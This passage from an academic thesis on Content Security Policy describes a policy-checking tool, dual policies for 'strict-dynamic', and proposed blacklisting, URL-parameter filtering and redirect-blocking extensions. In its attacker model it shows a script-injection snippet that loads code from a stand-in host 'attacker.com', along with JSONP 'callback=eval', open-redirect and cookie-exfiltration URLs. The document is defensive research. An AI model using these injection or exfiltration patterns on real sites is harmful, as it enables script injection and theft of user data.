Errors and misconfigurations This includes misspelled directive names or values (e.g., defalt-src instead of default-src), quoting issues (using double quotes instead of single ones for ’self’, or not quoting values when they should be quoted), and a missing colon after a scheme name (https instead of https:) [177]. For all these cases, the tool suggests changes to the developer. To make a suggestion, we compute the Levenshtein distance 6 between known directive names and values and the misspelled ones. The suggestions are then shown to the developer, who can change the policy accordingly. The list of directive values that should be quoted is given by the CSP specification (’self’, ’none’, nonces, hashes, ’strict-dynamic’). Other values (origins, schemes, and sandbox directive flags) should not be quoted. Only single quotes are accepted by the specification. The tool also ensures that schemes always end with a colon (https:); otherwise, suggestions are made to the developer to fix them.
5. https://swexts.000webhostapp.com/dependencies/
6. https://en.wikipedia.org/wiki/Levenshtein_distance
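As an illustration (a sketch with assumed helper names, not the tool's actual code), misspelled directive names can be mapped to suggestions with the Levenshtein distance as follows.

// Classic dynamic-programming Levenshtein distance between two strings
function levenshtein(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0)));
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,                                     // deletion
        dp[i][j - 1] + 1,                                     // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));  // substitution
    }
  }
  return dp[a.length][b.length];
}

const KNOWN_DIRECTIVES = ["default-src", "script-src", "object-src", "style-src"]; // partial list

// Suggest the closest known directive if it is within a small edit distance
function suggestDirective(name, maxDistance = 3) {
  const best = KNOWN_DIRECTIVES
    .map(d => ({ d, dist: levenshtein(name, d) }))
    .sort((x, y) => x.dist - y.dist)[0];
  return best.dist <= maxDistance ? best.d : null;
}

suggestDirective("defalt-src"); // "default-src"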
Dependencies Directive dependencies are described in Section 3. The tool detects them and proposes to resolve them. For instance, when scripts are specified while the sandbox directive does not include the allow-scripts flag, this is detected as a dependency issue, and the developer is advised to either allow script execution by adding the allow-scripts flag to the sandbox directive, or disallow script execution by setting the script-src directive value to {’none’}. Other dependencies are treated similarly.
It is worth mentioning the ability to execute scripts with Flash plugins. Whenever the object-src directive can be used to execute scripts (using Flash) from additional origins not included in the script-src directive, the tool suggests to either remove from object-src the additional origins not whitelisted in script-src, or simply set its value to ’none’ [267], among other options (see Table 4.4 for more details).
Semantics The tool generates the semantics of the policy, that is, all the origins from which content can be loaded for each type of content according to the CSP. In particular, the default-src directive is expanded by adding the directives which fall back to it when they are not explicitly specified. Any other missing directive (which does not fall back to default-src) is explicitly added, as allowing any content of the related type to load.
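A minimal sketch of the expansion step, assuming a (partial) hard-coded list of directives that fall back to default-src:

// Partial list of fetch directives that fall back to default-src when absent
const FALLBACK_TO_DEFAULT = ["script-src", "style-src", "img-src", "font-src",
                             "connect-src", "object-src", "media-src"];

function expandDefaultSrc(policy) {
  const expanded = { ...policy };
  if (!("default-src" in policy)) return expanded;       // nothing to expand
  for (const directive of FALLBACK_TO_DEFAULT) {
    if (!(directive in expanded)) {
      expanded[directive] = [...policy["default-src"]];   // inherit the default-src sources
    }
  }
  return expanded;
}

expandDefaultSrc({ "default-src": ["'self'"], "script-src": ["trusted.com"] });
// { "default-src": ["'self'"], "script-src": ["trusted.com"], "style-src": ["'self'"], ... }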
Redundancies The tool is also able to detect origin redundancies in the policy and suggest that developers remove them, in order to improve the clarity and maintainability of the policy. For instance, the origin *.example.com covers www.example.com. When those two origins are both whitelisted, the tool suggests keeping only the first one.
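A minimal sketch of this redundancy check (simplified to subdomain wildcards only; names are illustrative):

// A source is redundant if another whitelisted wildcard source already covers it
function isCoveredBy(origin, wildcard) {
  return wildcard.startsWith("*.") && origin.endsWith(wildcard.slice(1));
}

function removeRedundantOrigins(sources) {
  return sources.filter(src =>
    !sources.some(other => other !== src && isCoveredBy(src, other)));
}

removeRedundantOrigins(["*.example.com", "www.example.com", "cdn.net"]);
// [ "*.example.com", "cdn.net" ]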
6 DF-CSP and strict CSP
In this section, we discuss the use of the keyword ’strict-dynamic’ in backwards compatible policies such as DF-CSP. To improve the protection of an application deploying CSP in a backwards compatible fashion, we propose that web applications always accompany a nonce-based policy that makes use of ’strict-dynamic’ with an origin-based policy that further limits an attacker's power. This second policy is not written by hand, but automatically generated from the policy that makes use of ’strict-dynamic’: it is exactly the same as the first one, except that it does not include the ’strict-dynamic’ keyword.
One can still benefit from ’strict-dynamic’, by enabling whitelisted scripts to further load all their dependencies (additional scripts) without having to assign individual nonces or hashes to these dependencies. When the policy is enforced in a CSP1- or CSP2-compliant browser, all the dependencies can still load thanks to the origins (CSP1) and/or nonces (CSP2). Regardless of the version of CSP supported by the browser, an attacker who manages to compromise a trusted script cannot load more scripts than what is declared in the origin-based policy. In fact, browsers will enforce both policies. Content is allowed
to load only if it is allowed by both policies. Since the origin-based policy clearly states the origins from which trusted scripts can load, the attacker can only load content from these origins, which are already trusted anyway.
6.1 Attacker model
The attacker here is able to control the URLs of non-parser-inserted scripts dynamically injected by a trusted script [267,272]. Below is an example of a dynamic script injection.
script = document.createElement("script");
script.src = "http://attacker.com/x.js";
document.body.appendChild(script);
We consider that the attacker can control the value of the src attribute of the dynamically injected script. For instance, this URL may be retrieved from a database, or result from an XSS attack.
6.2 Design
To deploy multiple CSPs, one simply separates them with commas. Hence, the single policy in Listing 2.1 is rewritten into the two following policies:
script-src ’strict-dynamic’ ’nonce-abcdef’ ’self’ https://trusted.com; object-src ’none’;,
script-src ’nonce-abcdef’ ’self’ https://trusted.com; object-src ’none’;
The first policy is exactly the same as the one in Listing 2.1. The second one is identical except that it does not have the ’strict-dynamic’ keyword in its script-src directive; this is the sole difference between the two policies, and the second policy is automatically generated from the first one. Deployed together, the two policies successfully provide the same protection against attacks. Considering only the script-src directive, in CSP3 the two policies ’strict-dynamic’ ’nonce-abcdef’ https://trusted.com and ’nonce-abcdef’ ’self’ https://trusted.com will both be enforced. Even if an attacker manages to compromise a script, he cannot inject arbitrary content, because of the second policy, which restricts the sources of trusted scripts to ’nonce-abcdef’, ’self’ and https://trusted.com. This is exactly the same protection provided in CSP1 and CSP2 when the two policies are both enforced. This design helps preserve the protection of the application across browsers supporting different versions of CSP, and more importantly, helps prevent attackers from injecting arbitrary content when they manage to compromise a trusted script, in particular in CSP3-compliant browsers.
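As a sketch of how the companion policy can be generated automatically (assumed helper name and simplified string handling; not the exact implementation), one can simply strip the ’strict-dynamic’ token from the strict policy:

function companionPolicy(strictCsp) {
  return strictCsp
    .split(";")
    .map(directive => directive
      .split(/\s+/)
      .filter(token => token !== "'strict-dynamic'")  // drop only the strict-dynamic keyword
      .join(" ")
      .trim())
    .filter(d => d.length > 0)
    .join("; ");
}

const strict = "script-src 'strict-dynamic' 'nonce-abcdef' 'self' https://trusted.com; object-src 'none'";
// Deploy both policies, for instance comma-separated in the same header:
const header = strict + ", " + companionPolicy(strict);
// script-src 'strict-dynamic' 'nonce-abcdef' 'self' https://trusted.com; object-src 'none',
// script-src 'nonce-abcdef' 'self' https://trusted.com; object-src 'none'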
6.3 Applications vulnerable to such attacks
We performed an analysis of the CSP policies of the top 100k Alexa sites to assess how websites using ’strict-dynamic’ are protected against such attacks. Our results show that ’strict-dynamic’ is not very widespread: we found the keyword in the CSPs of pages from 24 different origins. Among those, only https://www.dropbox.com and https://earn.com deployed a policy set consisting of two policies. All other origins were vulnerable to this attack. It is worth noting that, among those sites, 7 deployed very liberal policies, allowing the https: and http: schemes in the script-src directive [177]. This already allows attackers to inject arbitrary content in CSP1 or CSP2, which implies
that the attacker already gains the same power in all versions of the specification for these
websites.
7 Conclusion
Following the success of CSP1 and CSP2, the W3C is currently actively working on the
next version of the specification, CSP3. Each version builds on the previous one, with
changes aimed at improving the security and ease of adoption by developers. In this work,
we have highlighted and addressed the semantics and security challenges related to the
changes introduced in each version of the specification, in particular when a single policy
has to be enforced in different browsers providing implementations which are not always
compliant with the specification. We formalized the differences between the specifications as dependencies, and proposed a set of rewriting rules for building dependency-free policies (DF-CSP). To the best of our knowledge, this work is the first comprehensive study of CSP dependencies, and the first to propose a tool for resolving these dependencies in order to obtain effective CSP policies.
Chapter 5
Extending CSP: Blacklisting, URL arguments
Filtering and Monitoring
Preamble
This chapter presents proposals for extending the CSP specification to address different limitations of CSP that have been demonstrated in the literature or identified by us. In particular, we propose and implement a blacklisting mode for CSP, a mechanism for filtering URL parameters, a directive for preventing redirections, and an efficient reporting mechanism for collecting feedback about the runtime enforcement of CSP.
This chapter has been submitted for review.
1 Introduction
Previous studies have demonstrated the limitations of CSP as a whitelisting mechanism,
and the attacks that can be mounted to bypass CSP [212,267]. To illustrate these limita-
tions, we pose the following research questions regarding important security requirements
for an application.
How do we effectively whitelist a precise set of trusted content from a domain? In this scenario, a developer does not trust a whole third party domain, but only specific content, or a set of content. CSP makes it possible to express this by partially whitelisting an origin. In other words, instead of declaring the whole (third party) origin in a policy, one declares only the specific trusted content or set of content from the domain. As such, the origin is partially whitelisted, and only the whitelisted content is allowed to load. Nonetheless, by using HTTP redirections, any content from the partially whitelisted origin can be loaded [272,275]. In particular, when the CSP whitelists origins that host insecure open redirect endpoints, the CSP can be bypassed by loading any content from the partially whitelisted origin, as if the origin were fully whitelisted [267].
How do we exclude untrusted content from a whitelisted origin? In this second scenario, the developer needs to whitelist an origin but exclude specific content, or a set of content, that it hosts. For instance, the content to exclude is untrusted content known for introducing a threat into the application. This is the case of the popular AngularJS JavaScript library [8]: Weichselbaum et al. [267] reported that it allows the execution of arbitrary scripts in a webpage, despite CSP. Another case we found interesting is a webpage that loads
scripts from its own origin and also from a third party domain. However, the developer
may want to prevent the third party from loading scripts located at the developer’s website
under the path /admin/ because it contains sensitive scripts. The developer may also want
to prevent the third party script from discovering that there is a user logged into the
current web application. In fact, in a recent study, Gulyás et al. [198] demonstrated that, by loading a resource such as an image which is only accessible once a user is logged into a website, a third party script can discover that the user is logged into that website and use this information for tracking purposes, for instance. Unfortunately, CSP does not allow blacklisting specific content, or a set of content, of an origin. When an origin is declared in a policy, it is considered trusted in its entirety.
How do we filter out unsafe URL parameters? In this scenario, we consider that an origin is whitelisted, but one would like to ensure that URLs injected in the webpage do not have parameters. That is, when an origin hosts content such as insecure JSONP endpoints, the URL parameters of requests to load such content can be leveraged by an attacker to execute arbitrary content [212,267]. Bypassing partially whitelisted origins through HTTP redirections is also done by leveraging the parameters of open redirects [267]. Unfortunately, URL parameters are ignored by browsers when they match a URL against a policy. Additionally, to exfiltrate user data, attackers usually pass the data as parameters of the URLs of HTTP requests to load content. Hence, even if a CSP tries to prevent data exfiltration by restricting the endpoints to which AJAX requests can be made [275], attackers can still exfiltrate data by passing it as parameters of URLs of other types of content considered less security critical, such as images.
How do we efficiently collect feedback about the runtime enforcement of CSP in a webpage? A developer would like to know which content is allowed by the CSP deployed to protect the webpages of her application. This feedback can be useful for many reasons. First, even if an application has been heavily tested, it cannot be excluded that an attacker finds a vulnerability and injects malicious content into the application. Moreover, an error in a CSP may result in the policy being more permissive than expected, allowing attacker-injected content to load [177]. Furthermore, browser extensions are widespread on major browsers [24,58,94,108]. In particular, they have the ability to intercept and modify the CSPs deployed to protect webpages, and to inject into webpages their own content, which is not always required to comply with the CSP of the page [26,200]. Such extension content may further inject vulnerabilities into webpages which are otherwise restricted by CSP. Finally, the new ’strict-dynamic’ keyword introduced in CSP3 [267,272] potentially allows any script to be loaded in a webpage at runtime. It makes it impossible to statically know the content (scripts) allowed by a policy before it is effectively enforced in a browser. Hence, knowing which content is effectively injected in a webpage at runtime represents valuable information that can help assess the security of a webpage and deploy more secure policies.
Weichselbaum et al. [267] proposed the use of nonces to mitigate CSP bypasses based
on open redirects and unsafe JSONP endpoints. However, this solution comes with the
following issues. First, the security of nonces is questionable because they are included in
the DOM of webpages [178,272,275]. Moreover, the use of nonces does not prevent a script
that is already loaded in the webpage from making requests with JSONP parameters, or
from redirecting to partially whitelisted origins, especially if the script gets compromised.
Finally, nonces apply only to scripts and stylesheets, and not to other types of content
such as images, whose URL parameters an attacker can leverage to exfiltrate user data for
instance. CSP provides a reporting mechanism for developers to collect violations which occur in browsers during its enforcement [261,272,275]. Violations are triggered by content not matching the CSP of the page. Ultimately, deploying the most restrictive policy (a policy that does not allow any content to load) in report-only mode could potentially give feedback about the content that loads in an application. This method, however, is inefficient and incomplete. In fact, a CSP in report-only mode implies that any content in the webpage will trigger a violation, and browsers will submit a report for each individual violation. If the webpage loads a lot of content, then the reports sent for each piece of content from the browsers of all the users of the application potentially introduce an overhead on the application server side. Moreover, if a violation is triggered, is it because of trusted content or untrusted content? To distinguish between trusted and untrusted content, one would have to deploy at least two policies, one in report-only mode and the other one in enforcement mode, collect violations in both cases, and compute the difference to get the content effectively allowed by the policy. Furthermore, content injected by browser extensions, which is not always subject to the CSP of the page, will not trigger any violation report. Collecting feedback by using CSP violations is therefore incomplete. Finally, the use of ’strict-dynamic’ in CSP3 makes it difficult to know in advance the origins from which content in a webpage will be effectively loaded, before the CSP is enforced.
To fully address the aforementioned issues, we propose to extend the current CSP specifi-
cation.
Adding a blacklisting mode to CSP Currently, the CSP specification defines two modes: the report-only mode, in which policies are enforced but browsers do not block content not allowed by the policy; and the enforcement mode, in which content that is not allowed by the policy is effectively blocked. We refer to these two modes as CSP whitelisting modes. The proposed blacklisting mode is the exact opposite of the enforcement mode: content that matches a CSP in blacklisting mode is blocked, otherwise it is allowed. We propose to introduce a new header, Content-Security-Policy-Blacklisting, for deploying CSP in blacklisting mode. One would use this mode to exclude specific content, or a set of content, on a domain from loading in a webpage. CSP in blacklisting mode proves useful when one knows that a domain hosts content that is potentially malicious and could introduce further vulnerabilities if loaded in a webpage. This new mode can also serve to explicitly prevent the loading of sensitive content in a webpage, as such content may reveal information about a logged-in user for instance [198]. The blacklisting mode is meant to be used as a complement to a CSP deployed in either of the whitelisting modes.
Filtering URL parameters We propose extending the URL matching algorithm of CSP [275], which is used to check whether a URL is allowed by a policy or not, in order to take URL parameters into consideration. In the current status of the specification, URL parameters are considered trusted by default. The proposed extension enables declaring origins, paths, and specific content together with the URL arguments that are trusted or untrusted. This extension is meant to be used with the new CSP blacklisting mode. While entire content can already be blacklisted, by filtering URL parameters one can further blacklist content when it is injected in webpages with URLs that have specific unsafe parameter names or parameters with unsafe values, or even prevent URLs with any parameters at all. The URL filtering mechanism perfectly fits requirements where one wants to ban URL arguments in requests to insecure JSONP endpoints or open redirect endpoints, or to prevent data exfiltration via URL parameters.
Disallowing redirections to partially whitelisted origins The CSP bypass due to partially whitelisted origins can already be mitigated with the two previous proposals. In fact, if one identifies the open redirect endpoints of origins whitelisted in a policy, they can either be blacklisted or have their URL parameters filtered in order to prevent them from redirecting to partially whitelisted origins. Nonetheless, one has to ensure that all open redirect endpoints are identified and blacklisted: missing a single endpoint is sufficient to leave the whole CSP bypassable. We therefore propose to introduce a new directive, disallow-redirects, that can be used in policies to instruct the browser to prevent all redirections to partially whitelisted origins. In the current CSP URL matching algorithm [275], browsers allow loading any content from a partially whitelisted origin if the content is the result of an HTTP redirection [272,275]. The new directive is meant to alter this precise part of the algorithm: when it is used in a policy, browsers should prevent any content not explicitly whitelisted on a partially whitelisted origin from loading. This ensures that once an origin is partially whitelisted, browsers strictly enforce it.
Efficient feedback reporting mechanism Finally, we propose extending CSP with an efficient reporting mechanism for content that matches a policy, similarly to CSP violation reports. While a browser enforces a policy, it can keep track of all content matching the policy, and report this information to an endpoint specified in the CSP of the page. To specify the endpoints for collecting feedback, we introduce the directives monitor-uri and monitor-to, similar to the report-uri and report-to directives currently used for collecting violations. To make the mechanism efficient, reports may be sent after all content is loaded and the page enters a stable state. Content injected thereafter could be reported at regular intervals, according to a delay defined by the browser. The web application developer can analyze this feedback and look for potentially malicious content that loaded because of errors or misconfigurations in the policy, content injected by browser extensions, or dynamic content loaded by scripts when the ’strict-dynamic’ keyword is used in a CSP. The policy can then be updated to improve its effectiveness.
As we have shown, these extensions improve on previous proposals for fighting CSP bypasses. Nonces, which have been proposed to mitigate JSONP and open redirects, have been criticized in the literature, mostly because they are included in the DOM of web applications, and attackers can use scriptless attacks to read nonces and inject arbitrary content [178]. Filtering URL parameters can prevent data exfiltration, JSONP abuse, and open redirects by mandating that request URLs carry no arguments, or none of specific unsafe arguments. Using the CSP violation reporting mechanism to get feedback is inefficient and incomplete: it introduces an overhead and requires the deployment of two policies.
To further show that the proposed extensions require few changes from a browser perspective, we implemented them using service workers in an example web application. Service workers (which we refer to as a monitor) intercept HTTP requests initiated by browsers to load content in a webpage. As such, they act like a proxy for content included in the page [149]. We deploy a service worker with an example web application, which deploys a CSP in enforcement mode and another policy in blacklisting mode. The CSP in blacklisting mode is enforced by the monitor, and the CSP in whitelisting mode is enforced by the browser. Once the URL of a content matches the whitelisting policy, the browser makes a request to fetch its content. The request is then sent to the service worker, which further checks its URL against the blacklisting policy. If the URL matches the blacklisting policy (either because it is blacklisted content or carries untrusted arguments), then the request is blocked; otherwise it is effectively made. For open redirects, as HTTP redirections are not intercepted by service workers for security reasons [275], we could not fully implement the new disallow-redirects directive. Nevertheless, to prevent redirections to partially whitelisted origins, we assumed that all open redirects are known by the developer. Then we either used the new blacklisting mechanism to blacklist the open redirects, or prevented
them from carrying URL parameters by filtering these out with the new URL parameter filtering mechanism we introduced. Finally, the monitor also logged all the URLs of content that it intercepted and reported them to the developer, as feedback on the runtime enforcement of CSP.
In summary, this study contributes with four new extensions to the Content Security
Policy. It aims at improving the security of web applications, by (i) expressing policies
in blacklisting mode, (ii) filtering URL arguments, (iii) disallowing redirects to partially
whitelisted origins and finally (iv) providing developers with an efficient way for collecting
feedback about the runtime enforcement of their policies in an application.
2 Problem and motivation
For the sake of simplicity, throughout the rest of this work we describe in more detail the issues we addressed by considering mostly the script-src directive, which sets restrictions on the origins from which trusted scripts can load. Nonetheless, this work is more general and concerns CSP as a whole, its other directives and content types. To illustrate the limitations of CSP and motivate our proposals, we consider the following policies.
script-src https://trusted.com https://redirect.com https://partials.com/scripts/;
img-src trusted.com/image.png;
Listing 5.1 – Example of an origin-based CSP
default-src ’none’; form-action ’none’;
frame-ancestors ’none’; report-uri /allcontent
Listing 5.2 – Restrictive policy in report-only mode to get the list of content loaded
in a webpage
script-src ’nonce-random1234’ ’strict-dynamic’
Listing 5.3 – Example of CSP with nonces, or nonce-based policy
Listing 5.1 presents a CSP where trusted scripts are whitelisted by their origins. We refer to
them as origin-based policies. Only scripts from the explicitly specified origins are allowed
to load in the webpage on which this policy will be deployed. The injection of a script
with the URL https://trusted.com/script.js in the webpage is allowed since the script
comes from the whitelisted origin https://trusted.com. Listing 5.2 presents a restrictive
policy that basically prevents a page from loading content. Listing 5.3 presents a nonce-
based policy. When a nonce-based policy makes use of the ’strict-dynamic’ keyword, we
refer to the overall policy as a strict CSP. Nonces are used to whitelist individual scripts.
To allow a script to load, one injects <script src="https://trusted.com/script.js"
nonce="random1234"></script> in the page. Note the use of the nonce attribute on the
script tag. Its value is the nonce whitelisted in the policy (See Listing 5.3). With the
presence of the ’strict-dynamic’ keyword, whitelisted scripts (with nonces) that load
in the page can further dynamically inject additional scripts, even though the additional
scripts are not assigned whitelisted nonces 1. Hence, contrary to the origin-based CSP in
Listing 5.1 where one knows the exact origins from which content can load, in the case of
strict CSP in Listing 5.3, scripts that effectively load are known only at runtime (when the
page is loaded in a browser and the policy enforced).
1. Nonces and hashes work quite similarly [272,275]
2.1 Partially whitelisted origins
In the CSP of Listing 5.1, from the domain https://partials.com, only scripts with the
path /scripts/, for instance https://partials.com/scripts/a.js are trusted. Hence,
trying to inject https://partials.com/script.js will fail. Nonetheless, one can get this
script loaded and executed if it is loaded as the result of an HTTP redirection [272,275].
To illustrate the bypass of partially whitelisted origins, let’s assume that the origin https:
//redirect.com, which is also whitelisted in the CSP of Listing 5.1, hosts an open redi-
rect endpoint https://redirect.com/r. In other words, instead of directly injecting
https://partials.com/script.js, one passes the URL of the script as an argument to the
open redirect endpoint by injecting a script with the URL https://redirect.com/r?url=
https://partials.com/script.js. Instead of returning a script to be executed, the open
redirect generates an HTTP redirection Location: https://partials.com/script.js.
Since this is an HTTP redirection, the browser will not check whether the whole URL
matches the CSP. It is sufficient that the origin of the request be fully or partially whitelisted
in the CSP of the page for the script to be allowed via the HTTP redirection. And since this
is the case (See Listing 5.1), then the script https://partials.com/script.js is allowed
to load, even though its URL does not match the CSP. This bypass works in CSP2 [275]
and CSP3 [272].
2.2 Excluding content from whitelisted origins
Now let’s assume that from the CSP of Listing 5.1, most of the scripts from the https:
//trusted.com origin are trusted. However, the origin also hosts the insecure script https:
//trusted.com/untrusted.js and hosts sensitive scripts in the /admin/ folder (scripts
whose paths start with https://trusted.com/admin/) that must not be loaded in the
current page. CSP does not provide a mechanism for excluding content from an origin.
When an origin is whitelisted, it is trusted in its entirety.
2.3 URL parameters
URL parameters are not taken into consideration when browsers match a URL against a policy. Consider the CSP of Listing 5.1: the URLs https://trusted.com/script.js and https://trusted.com/script.js?func=eval&arg=1 both match the CSP if they are used to inject a script, and the URL https://trusted.com/image.png?data=someuserdata&cookie=usercookies matches the policy if it is the URL of an image injected in the page. In the first case, the URL does not have any parameter. In the second case, the same URL is provided the parameters func with the value eval and arg with the value 1. While, according to CSP, these two URLs are exactly the same, in practice they may result in the execution of completely different content. In the second case, if the provided parameters are used to generate the response that is returned, we run into JSONP requests, which can lead to a CSP bypass [212,267]. In the third case, the URL to load the image is passed some user data and cookies as parameters, so that they are exfiltrated to trusted.com.
2.4 CSP violations
CSP can be used in two modes. In the report-only mode, policies are delivered to browsers using the Content-Security-Policy-Report-Only header. In this mode, content not matching the policy is not blocked by the browser; it is simply reported to the developer as CSP violations. In the enforcement mode, on the other hand, policies are delivered to browsers using the Content-Security-Policy header. When browsers enforce such a policy, content that does not match the policy is effectively blocked, and a violation report is also sent. CSP allows combining policies in different modes, or even deploying multiple policies in the same mode. Multiple policies are all enforced individually; in this case, a resource is allowed to load if it is allowed by all the policies. The directives report-uri (in CSP1, CSP2) and report-to (in CSP3) are used in a policy to indicate where CSP violations will be submitted [272,275].
The violation reporting mechanism of CSP can be used to build the list of content that loads in a webpage. To do so, one has to deploy two policies: a policy in enforcement mode (such as the ones in Listings 5.1 and 5.3), and a policy in report-only mode that does not allow any content, such as the policy shown in Listing 5.2. Since the latter policy is in report-only mode, any content that attempts to load in the webpage will trigger a CSP violation. Hence, every content triggers a violation, and it is therefore impossible to distinguish between malicious and trusted content by analyzing the violations reported by a single policy in report-only mode. So one also has to collect the violations triggered by the policy in enforcement mode, deployed to effectively prevent malicious content from loading (i.e. the policies shown in Listings 5.1 and 5.3); violations of this policy are triggered only by content not matching the policy. Computing the difference between the two sets of reports then gives the content that effectively loaded because it is allowed by the CSP of the webpage. It is worth mentioning the case of browser extensions, whose content is not always subject to the CSP of the page [26,200]. For instance, if the policy in Listing 5.1 is deployed on a webpage, this does not prevent a browser extension from injecting a script with the URL https://untrusted.com/vulnerable.js, even if this URL is not allowed by the policy. Worryingly, the browser extension may be injecting content that introduces vulnerabilities into the webpage. Moreover, the injection of this script will not trigger a CSP violation report, even in the presence of a CSP in report-only mode such as the one in Listing 5.2.
2.5 Motivation
To help mitigate the CSP bypasses due to JSONP and open redirects, Weichselbaum et al. [267] suggested the use of nonces for whitelisting individual scripts instead of whitelisting the origins, URLs or paths of the scripts. Nevertheless, recent studies question the security of nonces, mostly because nonces are included in the DOM of webpages and are thereby subject to leakage by scriptless attacks [178]. Moreover, the use of nonces does not prevent a script which is already loaded in a webpage from making requests with unsafe JSONP parameters, using open redirects, or loading untrusted content. If a whitelisted script gets compromised by an attacker, then he can bypass the CSP at will. Nonces apply only to the scripts (script-src) and stylesheets (style-src) content types, and not to other types of content. The violation reporting mechanism is better suited to violations that occur from time to time, and is not suited for efficiently collecting feedback about the content that loads in a webpage. Moreover, it does not report content injected by browser extensions. Also, when a page deploys a strict CSP, collecting feedback is useful because one cannot know in advance the content allowed by the strict CSP before it is enforced.
To successfully address the aforementioned issues, we propose to extend the CSP specification with (i) a blacklisting mode, (ii) a URL arguments filtering mechanism, (iii) a new directive for preventing redirections to partially whitelisted origins and (iv) a mechanism for efficiently collecting feedback about the runtime enforcement of the policy of a webpage by browsers.
3 Extending CSP specification
In this section, we introduce the extensions we propose to the CSP specification.
3.1 CSP in blacklisting mode
Similarly to the Content-Security-Policy and Content-Security-Policy-Report-Only
headers used for deploying a CSP in enforcement and report-only modes respectively, we
propose a new header Content-Security-Policy-Blacklisting for deploying CSP in
blacklisting mode. Semantically, the blacklisting mode is the exact opposite of the en-
forcement mode. Hence, when a URL matches a CSP in blacklisting mode, then it is not
allowed to load. Consider the policy in Listing 5.4.
script-src cdn.cloudfare.com/angular.js;
Listing 5.4 – A CSP in blacklisting mode to exclude angular.js
In enforcement mode, this policy would have allowed the angular.js script to load. By deploying the policy in blacklisting mode, the script is blacklisted and hence not allowed to load. One can therefore combine this policy with another policy in enforcement mode to prevent only angular.js from loading, while allowing any other content from cdn.cloudfare.com to load. Listing 5.5 presents the two policies.
Content-Security-Policy: script-src cdn.cloudfare.com
Content-Security-Policy-Blacklisting: script-src cdn.cloudfare.com/angular.js
Listing 5.5 – Combining two policies: one in enforcement mode, and the other one in
blacklisting mode
3.2 Checks on URL arguments
To illustrate this proposal, let's consider the following scenario. The CSP in Listing 5.6 whitelists jsonp.com, which hosts an insecure JSONP endpoint that expects the parameter callback and uses it to generate a function call, passing it data.
Content-Security-Policy: script-src jsonp.com
Listing 5.6 – CSP with insecure JSONP endpoint
If an attacker injects http://jsonp.com/?callback=eval in a webpage, the returned re-
sponse is a function call to eval(...). Note that the URL argument is used to generate the
function call. To prevent the URL from loading when it is passed the callback parameter,
one could also deliver a CSP in blacklisting mode as shown in Listing 5.7 in addition to the
CSP in Listing 5.6 that allows parameters to be passed to the insecure JSONP endpoint.
Content-Security-Policy-Blacklisting: script-src jsonp.com/?callback
Listing 5.7 – Supporting URL parameters in CSP
The CSP in blacklisting mode mandates that, for URLs to load content from jsonp.com,
they must not have the argument callback. While the first policy only (Listing 5.6) would
have allowed http://jsonp.com/?callback=eval to load, deploying also the second policy
in blacklisting mode (Listing 5.7) would block it. By enforcing the CSP in blacklisting
mode, one detects that the URL of the resource to load has an argument, whose name
is callback. Therefore the URL is blocked. Note that this design does not prevent the
webpage from loading other content from jsonp.com. For instance, it is completely possible
to load http://jsonp.com/script.js, but not to load http://jsonp.com/script.js?
callback=foo. If the script URL carries other arguments, it is still allowed to load. For instance, loading http://jsonp.com/script.js?foo=bar is allowed by the policies above.
We have shown how to prevent URLs with a specific argument (callback in our example). Now we illustrate additional scenarios for filtering URL parameters.
Blocking all URLs with arguments To prevent URLs with any arguments, one simply ends the origins (paths or URLs) with ? in a blacklisting CSP.
Content-Security-Policy: script-src jsonp.com
Content-Security-Policy-Blacklisting: script-src jsonp.com/?
Listing 5.8 – Blocking all URLs with arguments
The policy in Listing 5.8 stipulates that arguments are not allowed on URLs of scripts
from jsonp.com. Without the CSP in blacklisting mode, any URL from jsonp.com would
have been allowed. Now, the second policy in blacklisting mode will block URLs with
parameters.
Blacklisting URLs when they have a specific argument value One can go even more fine-grained, by blocking URLs only when they have specific parameters with specific values. Listing 5.9 shows how to blacklist URLs from jsonp.com when they have the argument callback with the value eval.
Content-Security-Policy: script-src jsonp.com
Content-Security-Policy-Blacklisting: script-src jsonp.com/?callback=eval;
Listing 5.9 – Blacklisting URLs with specific argument names and values
While the browser would prevent http://jsonp.com/script.js?callback=eval from load-
ing, it would not prevent http://jsonp.com/script.js?callback=alert from loading.
Specifying multiple unsafe arguments The different scenarios presented above can
be combined to filter out URLs with a set of unsafe arguments. If multiple arguments
are specified for an origin in a blacklisting policy, then a URL is blocked if it has all
the blacklisted arguments. Listing 5.10 is a policy which blocks URLs having both the
callback and arg arguments with any values.
Content-Security-Policy: script-src jsonp.com
Content-Security-Policy-Blacklisting: script-src jsonp.com/?callback&arg;
Listing 5.10 – Blacklisting URLs with multiple unsafe arguments
This policy will block http://jsonp.com/script.js?callback=eval&arg=1, but not http:
//jsonp.com/script.js?callback=eval, because the first URL has both unsafe param-
eters, while the second one does not.
Blocking URLs with at least one untrusted argument To block URLs if they have
at least one argument among a set of unsafe arguments, one can declare the blacklisting
policy as shown in Listing 5.11.
Content-Security-Policy: script-src jsonp.com
Content-Security-Policy-Blacklisting: script-src jsonp.com/?callback jsonp.com/?arg;
Listing 5.11 – Blacklisting URLs with at least one of multiple unsafe arguments
A URL will be blocked if it has either the callback or the arg argument, with any value. Hence, http://jsonp.com/script.js?callback=eval and http://jsonp.com/script.js?arg=1 will be blocked, while http://jsonp.com/script.js?foo=bar will not be blocked.
3.3 Preventing redirections
In CSP1, when an origin is partially whitelisted, only content that matches the partially whitelisted origin can load. In CSP2 and CSP3, however, any content from a partially whitelisted origin is allowed to load as the result of HTTP redirections [272,275]. Here, we propose to extend the CSP specification so as to allow developers to explicitly prevent redirections to partially whitelisted origins. To do so, we propose a new directive, disallow-redirects. When this directive is present in a policy, it prevents redirections to partially whitelisted origins. Consider the following policy:
script-src https://partials.com/scripts/;
disallow-redirects;
Listing 5.12 – CSP that uses disallow-redirects to explicitly prevent redirections
to partially whitelisted origins
In the case of an HTTP redirection (using an open redirect endpoint for instance), a script from the partially whitelisted origin, such as https://partials.com/script.js, would be allowed in CSP2 and CSP3. The new disallow-redirects directive in the policy instructs the browser to prevent these redirections to the partially whitelisted origin.
3.4 Reporting runtime enforcement of CSP
